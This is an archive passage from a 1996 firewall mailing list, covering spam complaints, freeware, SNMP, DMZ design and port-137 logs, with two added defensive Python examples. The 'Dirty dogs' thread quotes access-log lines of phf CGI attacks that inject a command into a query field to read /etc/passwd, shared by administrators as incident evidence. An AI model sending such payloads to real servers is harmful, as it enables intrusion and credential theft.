I've found that mailing to > postmaster@aol.com gets good results in tracking abuses. Oh really? Sorry to sound cynical, but I suppose that has nothing to do with your mailing address :) On another mailing list to which I subscribed, we were pounded with spams, at least one a day. Firstly, I mailed the postmaster, with a copy of the headers, and informed them of the problem. I heard nothing. After a week of spams, I mailed again, pointed out that we now had 7 of these, and asked *politely* if something could be done about it. etc etc I continously asked for help in identifying the problem (the list admin was away at the time), and never received anything. Eventually the spams stopped, but the person simply moved lists. I am sure that their postmaster(s) have numerous mails of all sorts of complaints due to their number of users, but to ignore all of my mails - I consider that to be plain rude, and certainly not a "good result". - Dave. From firewalls-owner Mon Jul 15 05:39:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16141 for firewalls-outgoing; Mon, 15 Jul 1996 05:21:42 -0700 (PDT) Received: from zaphod.axion.bt.co.uk (dns0.axion.bt.co.uk [132.146.5.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA16109 for ; Mon, 15 Jul 1996 05:21:29 -0700 (PDT) Received: from syntegra.bt.co.uk (actually access1.syntegra.bt.co.uk) by zaphod.axion.bt.co.uk with SMTP (PP); Received: from pc-lyndon ([193.113.72.55]) by syntegra.bt.co.uk (5.x/SMI-SVR4) id AA23902; Mon, 15 Jul 1996 13:22:11 +0100 Message-Id: <31EA36C3.2615@syntegra.bt.co.uk> Date: Mon, 15 Jul 1996 13:17:07 +0100 From: Lyndon David Organization: Syntegra X-Mailer: Mozilla 2.02 (Win16; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Re: Freeware Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear All, One thing to remember about freeware is that the 
source is available and will have been looked at long and hard by the members of this group, and hence it is likely that defects have been found. This comes back to the old flame war of should we or should we not require the source for security software. My gut feeling is that the more complex the product and the more wizards and GUIs involved, the easier it is to miss something. Freeware is often very good but requires a greater effort on the part of the installer.

Lyndon David
------------------------------------
Please use email address lyndond@sentinet.co.uk for direct contact. I am just working as a contractor for Syntegra.

From firewalls-owner Mon Jul 15 06:23:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20194 for firewalls-outgoing; Mon, 15 Jul 1996 06:05:48 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20187 for ; Mon, 15 Jul 1996 06:05:40 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C.
Payne) Message-Id: <9607151300.AA19433@dsacg1.dsac.dla.mil> Subject: Re: Dirty dogs To: firewalls@count04.mry.scruznet.com Date: Mon, 15 Jul 96 9:00:46 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199607141756.KAA04146@count04.mry.scruznet.com>; from "firewalls@count04.mry.scruznet.com" at Jul 14, 96 10:56 am Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Subject: Dirty dogs
>To: firewalls@GreatCircle.COM
>Sender: firewalls-owner@GreatCircle.COM
>Precedence: bulk
>
>I was browsing through the system files of a web server that sits outside a
>firewall. There were a couple of interesting entries in the access log:
>
>960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400]
>"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
>960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
>"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207
>
>This didn't work for two reasons. One, there is no phf program in the system.
>Two, the cgi application gateway is running chrooted.
>
>I am not really very good at understanding this hacking and cracking stuff.
>What else could they have tried that might have worked?
>
> # whois 152.163

Hi,

I have a program (gethostbyaddr) that does reverse lookups without all the nslookup set(options) and I used it to find the address above; here's what I got and the name of the offending system.

#getaddr 152.163.192.15
Host IP address is: Most likely you know it, right.....
The hostname it is known as is: www-b2.proxy.aol.com

By the www-b2, I tried to connect to www-b2.proxy.aol.com and the server is apparently down at this time, or just refused my http connection. I tried to telnet to it, as well as ping, and it doesn't answer, so I would guess it's down.
I would think that what may have happened is that somehow someone got to the proxy server (www-b2.proxy.aol.com) and tried to use it as a base and link to other web sites, thus they connected to the original poster's server and started playing. If the IP addresses by AOL are dynamically allocated, then the time this server was connected to should be traceable to the originating dial-in account. It would take some doing on AOL's account, but is possible.

I would also guess that since the name is www-b2.proxy.aol.com that this may be some sort of firewall, and if so, there should be logs available to track the user(s) activity. It would require some effort from AOL, and I am not sure of their resources or capabilities in this area.

I would also guess that since AOL sends out all those little floppies with temporary access for a "free trial" that potential "hackers" have virtually unlimited access to the net on a "trial" basis. They could keep this up for quite some time (unlimited), and this is UNTRACEABLE.

take care
stevep.
spayne@dsdc.dla.mil

From firewalls-owner Mon Jul 15 07:34:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26079 for firewalls-outgoing; Mon, 15 Jul 1996 07:21:47 -0700 (PDT) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA26054 for ; Mon, 15 Jul 1996 07:21:33 -0700 (PDT) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) Date: Mon, 15 Jul 1996 10:18:15 -0400 (EDT) Message-Id: <199607151418.KAA09587@SPARKY.CF.CS.YALE.EDU> To: firewalls@GreatCircle.com, pchyland@tasc.com Subject: Re: What Parameters are Critical to Firewall Mgt?
Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

pchyland@tasc.com wrote:
> My overall research goal is to use SNMP to instrument
>security applications (such as an IDS, firewalls or S-HTTP) in order
>to provide more effective configuration, status and control. My
>belief is that a common security management framework that interacts
>with several different applications may be a more efficient and
>effective tool than several standalone tools.

I would have real concerns about using SNMP (especially SNMPv1 and SNMPv2 w/o encryption and authentication) to control (configure and manage -- I'd have much less of a problem with monitoring) firewalls. Even if you restrict all management stations and requests to the secure internal net.

- Morrow

From firewalls-owner Mon Jul 15 07:49:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26406 for firewalls-outgoing; Mon, 15 Jul 1996 07:33:34 -0700 (PDT) Received: from magellan.knight-ridder.com (magellan.knight-ridder.com [206.28.156.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA26395 for ; Mon, 15 Jul 1996 07:33:27 -0700 (PDT) Received: by magellan.knight-ridder.com; id HAA12323; Mon, 15 Jul 1996 07:29:00 -0400 Received: from unknown(166.108.250.155) by magellan.knight-ridder.com via smap (g3.0.3) Received: by exchange1.herald.com with Microsoft Exchange (IMC 4.0.838.14) Message-ID: From: Todd Williams To: "'firewalls@greatcircle.com'" Subject: RE: Extending Financial Applications And Protecting via a Firewall Date: Mon, 15 Jul 1996 10:29:38 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.838.14 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Syer A. Caudilll wrote:
> Our organization would like to extend a human resources application to
> Our goal is to allow end users to post payroll hours over
> the internet. The nature of the application requires allowing access to
> a production Oracle database. The only service to be provided is http.
> The database is production, must be updated by the end-user via the
> internet. What firewall strategies should be pursued for this type of
> endeavour? Any input would be appreciated.

There are lots of overall security issues here, but I'll just touch on some of the basics.

First, if your end users are going to be transmitting any "sensitive" info such as their social security #'s, you might want to look at running secure transactions via Netscape or some other "secure" server, depending on your company's policy on these things.

Second, the firewall issues can vary according to your implementation, but I'll describe one possible setup. You can run a 3 interface firewall - 1 outside, 1 inside, & 1 that houses your web servers, ftp servers, etc. Your Oracle db would sit somewhere on the inside network, not directly accessible from the outside. The web server would house your cgi program(s) to access the db, and the firewall would be configured to only allow traffic from that web machine through to the db. That way, your inside users can still have a clean access path to the db.

Third, you need to make absolutely sure that the userid that the cgi stuff will run as has the minimum necessary permissions to only the db tables it needs, and nothing more. Be especially aware of any "public" style db groups that all users fall into by default. For example, if the cgi userid is "www", the table is "payroll", and it only needs to add records, not update or delete, then you need to make sure that www has insert permission only for payroll and no other rights, either directly or via group membership.
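The grant check in Todd's third point is easy to get wrong because a database account inherits rights through roles and through the catch-all "public" grantee as well as directly. The following is an added example, not code from Todd's post or from anyone on the list: it resolves the effective object privileges of the CGI account ("www" on "payroll", the names Todd uses) by walking role membership and the PUBLIC grantee, then reports everything beyond an allow-list. The grant rows, the role names (hr_role, hr_app, admins) and the extra tables are constructed for illustration; in a real Oracle database the same rows would be pulled from DBA_TAB_PRIVS and DBA_ROLE_PRIVS.

```python
"""Audit the effective object privileges of a CGI database account.

Added example (not from the original post). Models the check Todd
Williams describes: the account the CGI runs as ("www") should hold
INSERT on "payroll" and nothing else, whether granted directly, through
a role, or through the PUBLIC grantee that every user belongs to.
The grant rows below are constructed for illustration; in Oracle they
would come from DBA_TAB_PRIVS (object grants) and DBA_ROLE_PRIVS
(role membership).
"""
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# (grantee, privilege, table) -- constructed rows, like DBA_TAB_PRIVS
OBJECT_GRANTS: List[Tuple[str, str, str]] = [
    ("www",     "INSERT", "payroll"),
    ("PUBLIC",  "SELECT", "employees"),   # catch-all grant the CGI inherits
    ("hr_app",  "UPDATE", "payroll"),
    ("hr_app",  "DELETE", "payroll"),
    ("hr_role", "SELECT", "payroll"),
    ("admins",  "SELECT", "salaries"),
]

# (grantee, role) -- constructed rows, like DBA_ROLE_PRIVS
ROLE_GRANTS: List[Tuple[str, str]] = [
    ("www",     "hr_role"),   # the CGI account was dropped into an HR role
    ("hr_role", "admins"),    # roles can nest, so rights arrive two hops away
    ("alice",   "hr_app"),
]


def roles_of(user: str, role_grants=ROLE_GRANTS) -> Set[str]:
    """All roles reachable from `user`, following nested role grants."""
    direct = defaultdict(set)
    for grantee, role in role_grants:
        direct[grantee].add(role)
    seen: Set[str] = set()
    stack = [user]
    while stack:
        grantee = stack.pop()
        for role in direct.get(grantee, ()):
            if role not in seen:
                seen.add(role)
                stack.append(role)
    return seen


def effective_privileges(user: str, object_grants=OBJECT_GRANTS,
                         role_grants=ROLE_GRANTS) -> Dict[Tuple[str, str], Set[str]]:
    """Map (privilege, table) -> the grantees through which `user` holds it."""
    grantees = {user, "PUBLIC"} | roles_of(user, role_grants)
    held: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for grantee, priv, table in object_grants:
        if grantee in grantees:
            held[(priv, table)].add(grantee)
    return dict(held)


def excess_privileges(user: str, allowed: Set[Tuple[str, str]], **kw):
    """Privileges `user` holds beyond the allow-list, with where they come from."""
    held = effective_privileges(user, **kw)
    return {k: v for k, v in held.items() if k not in allowed}


if __name__ == "__main__":
    policy = {("INSERT", "payroll")}   # the only right the CGI should have
    for (priv, table), via in sorted(excess_privileges("www", policy).items()):
        print(f"EXCESS: www has {priv} on {table} via {', '.join(sorted(via))}")
```

Run against the constructed rows, the audit flags SELECT on employees (via PUBLIC), SELECT on payroll (via hr_role) and SELECT on salaries (via admins, two role hops away); only the direct INSERT on payroll is allowed by policy. Fixing the findings means revoking the PUBLIC grant and removing www from hr_role rather than touching www's direct grants.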
From firewalls-owner Mon Jul 15 08:20:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA27857 for firewalls-outgoing; Mon, 15 Jul 1996 08:06:43 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA27850 for ; Mon, 15 Jul 1996 08:06:35 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id HAA18804; Mon, 15 Jul 1996 07:56:28 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id IAA24161; Mon, 15 Jul 1996 08:02:55 -0700 (PDT) From: Brian Murrell Message-Id: <199607151502.IAA24161@mocha.bctel.net> Date: Mon, 15 Jul 1996 08:02:54 -0700 (PDT) To: bhalla@wwonline.com Cc: firewalls@GreatCircle.COM Subject: Re: Encryption .. May be i am asking at the wrong place In-Reply-To: <199607130409.AAA12526@kimberlite.wwonline.com> X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I'm probably going to get stomped for something or another in this, however nothing ventured...

from the quill of N Bhalla on scroll <199607130409.AAA12526@kimberlite.wwonline.com>
> I was wondering I have read and heard a lot about pgp being the best
> package
> for data encryption which i do believe as well..

The best package for out of stream encryption, probably.

> But why are people still using other data encryption packages ..
> Why can't the unix password etc be also encrypted in PGP

Because PGP is not really suited to that task. You need to separate PGP and RSA public key technology as concepts. The latter is a general method of obtaining keys for parties to which you need to communicate securely, but have not done so in the past (i.e. you have no channel over which you can exchange keys).
The former uses the latter to encrypt data for another party, and/or to digitally sign data for another party.

> Why can't the cellular phones whose numbers are being tracked down by
> scanners not be encrypted in pgp ..

Several reasons. PGP describes a method for two unintroduced parties to encrypt and exchange information. It is an RSA key exchange as well as session key selection and encryption. The Cellular phone thing could probably start with RSA and move on from there, not really having anything to do with PGP. RSA is patented in the US and thusly would increase the cost of a cell phone in a market that probably could not bear it. There is already a digital cellular phone (de facto??) standard which boasts security. I know very little about cellular phones however.

> Why can't we have pgp for firewalls .. etc ..

Again, because PGP encryption is meant to be done out of stream. There are RSA based key exchange systems for stream encryption standards emerging, however they are not PGP per se.

b.

-- 
Brian J. Murrell                  Brian_Murrell@bctel.net
BCTel Advanced Communications     brian@ilinx.com
Vancouver, B.C.
brian@wimsey.com 604 454 5279 From firewalls-owner Mon Jul 15 09:41:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA05090 for firewalls-outgoing; Mon, 15 Jul 1996 09:26:13 -0700 (PDT) Received: from netsurfer.sersol.com (netsurfer.pixi.com [204.188.76.194]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA05083 for ; Mon, 15 Jul 1996 09:26:07 -0700 (PDT) Received: from netsurfer (www) by netsurfer.sersol.com ; 15 JUL 96 06:22:55 Date: Mon, 15 Jul 1996 06:22:55 -1000 (HST) From: NetSurfer X-Sender: netsurf@netsurfer To: Dave Roberts Cc: Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs on AOL In-Reply-To: Message-ID: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 15 Jul 1996, Dave Roberts wrote: > I continously asked for help in identifying the problem (the list admin > was away at the time), and never received anything. Eventually the spams > stopped, but the person simply moved lists. My experience with this is that AOL does not acknowledge the complaints but does act on them. In every case the postings stopped after the notification was sent. And I've seen complaints by ex-AOL users about being dropped for spamming. 
#include
_ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============

From firewalls-owner Mon Jul 15 12:48:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA17917 for firewalls-outgoing; Mon, 15 Jul 1996 12:32:40 -0700 (PDT) Received: from insite.virtual-x.com ([208.193.158.55]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA17910 for ; Mon, 15 Jul 1996 12:32:33 -0700 (PDT) Received: from insite.virtual-x.com (208.193.158.44) by insite.virtual-x.com Message-ID: <31EA9CD8.37EE@dornsife.com> Date: Mon, 15 Jul 1996 12:33:09 -0700 From: Harold Alston Reply-To: harold@dornsife.com Organization: Dornsife & Associates, Inc. X-Mailer: Mozilla 3.0b4Gold (Macintosh; I; PPC) MIME-Version: 1.0 To: James Proffer CC: firewalls@greatcircle.com Subject: Re: Dirty dogs References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

two attacks same kind on 7/14/96, both from same host. What action has anyone taken on these?

James Proffer wrote:
> 
> > We got a lot of these too:
> > 
> > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET
> > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 -
> > 
> > Not original but they tried--looks like an automated script judging from
> > the similarities of the log entries.
> > 
> > In any case does anyone else have any experiences with this? I know the
> > problem and all, I'm just trying to get an idea of how widespread this is.
> 
> Our one and only attempt was on July 4 of this year.
> 
> slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET
> /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 403 0
> 
> Missouri State Data Center <*> James Proffer: UNIX sysadm
> Missouri Government Information | mailto:james@mail.state.mo.us
> for the citizens of Missouri | http://www.state.mo.us/server.html
> and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299

-- 
___________________________
Harold Alston
harold@dornsife.com
Network Systems Administrator
Dornsife & Associates, Inc.
Internet Commerce Strategies
(p) 619-673-1855
(f) 619-673-1854
I do not fear computer.
I fear the lack of them.
- Isaac Asimov

From firewalls-owner Mon Jul 15 13:51:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA22104 for firewalls-outgoing; Mon, 15 Jul 1996 13:25:43 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA22097 for ; Mon, 15 Jul 1996 13:25:37 -0700 (PDT) Received: by hidata.com; id AA29166; Mon, 15 Jul 96 13:22:32 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Mon, 15 Jul 1996 13:22:25 -0700 Message-Id: <199607152022.NAA14781@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: Ports 137 & 138 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I too am curious about port 137. My site has no inbound services, only outbound. Do some NT websites use port 137 to resolve names? My proxy logs indicate that some hits on port 137 are in groups of 3, some from websites.
My perusal of denied 137 hits:

_Node_                        _# of hits (port 137)_
chopin.inoc.dl.nec.com             173
205.163.132.3                      159
www2.cardinal.com                  155
www.process.com                     92
194.88.4.49                         90
icent.samara.emnet.ru               90
grizzly.umt.edu                     72
pub.Imagazine.co.jp                 50
ep-server05.apertus.com             48
204.176.208.103                     45
198.64.207.4                        39
MFGINFO.COM                         39
www1.marvin.projectx.com            23
157.61.218.29                       20
tide19.microsoft.com                18
207.6.29.231                        17
207.6.29.233                        17
204.87.235.3                        11
www2.cardinal.com                    9
157.61.218.23                        6
204.126.174.71                       6
abash1.microsoft.com                 6
www3.hsonline.net                    5
157.61.218.31                        4
www.vit.com                          4
www.microsys.com                     3
mail.newworld.com                    3
mailgate.virtek.com                  3
smg.seagatesoftware.com              3
www.luckman.com                      3
198.83.40.75                         1
206.139.140.100                      1
aristotle.qi3.com                    1
ingate.idcresearch.com               1
mailgate.loud-n-bow.com              1
mjablecki.extern.ucsd.edu            1
nac-178.neural.com                   1
nac-71.neural.com                    1
ws1.gateway2000.com                  1
www1.marvin.projectx.com             1

Bill Stout
<=======10========20========30========40========50========60========70========80
William B. Stout       | Major revelations:
Senior Systems Admin   | "All objects are part of a larger object."
Hitachi Data Systems   | "3 aware beings comprise a person; mind, body, spirit."
NT/UNIX/I-net/Routers  | "The secret of life: To be involved with 'creation'."
408-970-4822           | Infowar, Cyber-war, yes, 'they' are out to get you...
--------------------------------------------------------------------------------
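Bill's per-host tally above was evidently built by hand from the deny log, and the "groups of 3" he mentions are the thing worth checking for: a NetBIOS name-service client that gets no answer retries its UDP/137 query, by default three times, so three denies from one source within a few seconds look like one unanswered lookup rather than three separate probes. The following is an added example, not code from Bill's post or from anyone on the list: it parses deny lines, rebuilds the per-source count, and flags sources whose hits arrive as bursts of three. The log lines and their "deny proto src:port -> dst:port" format are constructed for illustration (adapt LINE_RE to what your packet filter or proxy actually writes), the hostnames and addresses are documentation values, and the three-attempt retry count and five-second window are assumptions (BURST_SIZE, BURST_WINDOW).

```python
"""Tally firewall denies for UDP port 137 by source and spot retry bursts.

Added example, not from the original post. The log lines below are
constructed in a generic syslog-style "deny" format; LINE_RE must be
adapted to the real log. A source that shows up in tight groups of
three is consistent with a NetBIOS name-service client retrying an
unanswered query (three attempts is the usual default, assumed here
as BURST_SIZE).
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) deny (?P<proto>\w+) "
    r"(?P<src>[\w.\-]+):(?P<sport>\d+) -> (?P<dst>[\w.\-]+):(?P<dport>\d+)$")

BURST_SIZE = 3                        # NBNS retry count, assumed default
BURST_WINDOW = timedelta(seconds=5)   # retries land within a few seconds

# Constructed sample log: documentation names/addresses, not real hosts.
SAMPLE_LOG = """\
Jul 15 07:56:01 deny udp ws1.example.com:137 -> 192.0.2.10:137
Jul 15 07:56:02 deny udp ws1.example.com:137 -> 192.0.2.10:137
Jul 15 07:56:04 deny udp ws1.example.com:137 -> 192.0.2.10:137
Jul 15 08:12:30 deny udp www.example.net:137 -> 192.0.2.10:137
Jul 15 08:12:31 deny udp www.example.net:137 -> 192.0.2.10:137
Jul 15 08:12:33 deny udp www.example.net:137 -> 192.0.2.10:137
Jul 15 09:40:10 deny udp www.example.net:137 -> 192.0.2.10:137
Jul 15 09:40:11 deny udp www.example.net:137 -> 192.0.2.10:137
Jul 15 09:40:13 deny udp www.example.net:137 -> 192.0.2.10:137
Jul 15 10:02:00 deny udp 198.51.100.7:137 -> 192.0.2.10:137
Jul 15 10:03:00 deny tcp 198.51.100.7:1055 -> 192.0.2.10:139
Jul 15 10:05:00 deny udp 198.51.100.7:137 -> 192.0.2.10:137
"""

Record = Tuple[datetime, str, str, int]   # (timestamp, proto, src, dport)


def parse(log: str, year: int = 1996) -> List[Record]:
    """Parse deny lines; syslog stamps carry no year, so one is supplied."""
    out: List[Record] = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # unrelated or malformed line: skip, do not crash
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        out.append((ts, m["proto"], m["src"], int(m["dport"])))
    return out


def hits_by_source(records: List[Record], port: int = 137) -> Counter:
    """Denied UDP hits on `port` per source host: Bill's table, rebuilt."""
    return Counter(src for _, proto, src, dport in records
                   if proto == "udp" and dport == port)


def retry_bursts(records: List[Record], port: int = 137) -> Dict[str, int]:
    """Per source, how many groups of BURST_SIZE hits fell within BURST_WINDOW."""
    times: Dict[str, List[datetime]] = defaultdict(list)
    for ts, proto, src, dport in records:
        if proto == "udp" and dport == port:
            times[src].append(ts)
    bursts: Dict[str, int] = {}
    for src, stamps in times.items():
        stamps.sort()
        n = i = 0
        while i + BURST_SIZE <= len(stamps):
            if stamps[i + BURST_SIZE - 1] - stamps[i] <= BURST_WINDOW:
                n += 1
                i += BURST_SIZE   # consume the whole group
            else:
                i += 1
        if n:
            bursts[src] = n
    return bursts


def report(log: str) -> List[str]:
    """One line per source, busiest first, with its retry-burst count."""
    recs = parse(log)
    counts, bursts = hits_by_source(recs), retry_bursts(recs)
    lines = []
    for src, n in counts.most_common():
        tag = f"  ({bursts[src]} retry burst(s))" if src in bursts else ""
        lines.append(f"{src:<28}{n:>5}{tag}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```

On the constructed sample, www.example.net shows 6 hits as two clean bursts of three and ws1.example.com 3 hits as one burst, which is the retry signature; 198.51.100.7 shows 2 spaced-out hits plus a TCP/139 attempt that the port-137 tally ignores, and that mixed pattern is the one worth a closer look.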
From firewalls-owner Mon Jul 15 14:49:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA28223 for firewalls-outgoing; Mon, 15 Jul 1996 14:44:00 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA28172 for ; Mon, 15 Jul 1996 14:43:45 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607152140.AA16179@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Harold Alston Cc: James Proffer , firewalls From: Ryan.Russell/SYBASE Date: 15 Jul 96 14:40:45 EDT Subject: Re: Dirty dogs X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I have yet to see a CERT advisory on these... Don't they usually warn about attacks that are being actively pursued?

Ryan

---------- Previous Message ----------
To: james
cc: firewalls
From: harold @ dornsife.com (Harold Alston) @ smtp
Date: 07/15/96 12:33:09 PM
Subject: Re: Dirty dogs

two attacks same kind on 7/14/96, both from same host. What action has anyone taken on these?

James Proffer wrote:
> 
> > We got a lot of these too:
> > 
> > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET
> > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 -
> > 
> > Not original but they tried--looks like an automated script judging from
> > the similarities of the log entries.
> > 
> > In any case does anyone else have any experiences with this? I know the
> > problem and all, I'm just trying to get an idea of how widespread this is.
> 
> Our one and only attempt was on July 4 of this year.
> 
> slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET
> /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 403 0
> 
> Missouri State Data Center <*> James Proffer: UNIX sysadm
> Missouri Government Information | mailto:james@mail.state.mo.us
> for the citizens of Missouri | http://www.state.mo.us/server.html
> and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299

-- 
___________________________
Harold Alston
harold@dornsife.com
Network Systems Administrator
Dornsife & Associates, Inc.
Internet Commerce Strategies
(p) 619-673-1855
(f) 619-673-1854
I do not fear computer.
I fear the lack of them.
- Isaac Asimov

From firewalls-owner Mon Jul 15 15:21:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA00868 for firewalls-outgoing; Mon, 15 Jul 1996 15:11:59 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA00861 for ; Mon, 15 Jul 1996 15:11:52 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA11233 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Mon, 15 Jul 96 15:07:19 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607152207.AA01181@manzanita.DEV.3Com.COM.noname> To: mdr@vodka.sse.att.com, bobk@manzanita.DEV.3Com.COM Subject: RE: Web Server on DMZ Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

What I'm suggesting is that the outer firewall be a 3 port unit.

/Internet/---/Outer Firewall/--/DMZ with Servers/---/Corp Firewall/---/Corp Net/
                   |                                                      |
                   (Inactive to Corp Net)

The Corp Net connection on the far right of the top line can be swung to the outer firewall (assuming that you have port specific filtering capability) so that one firewall or the other is in place.
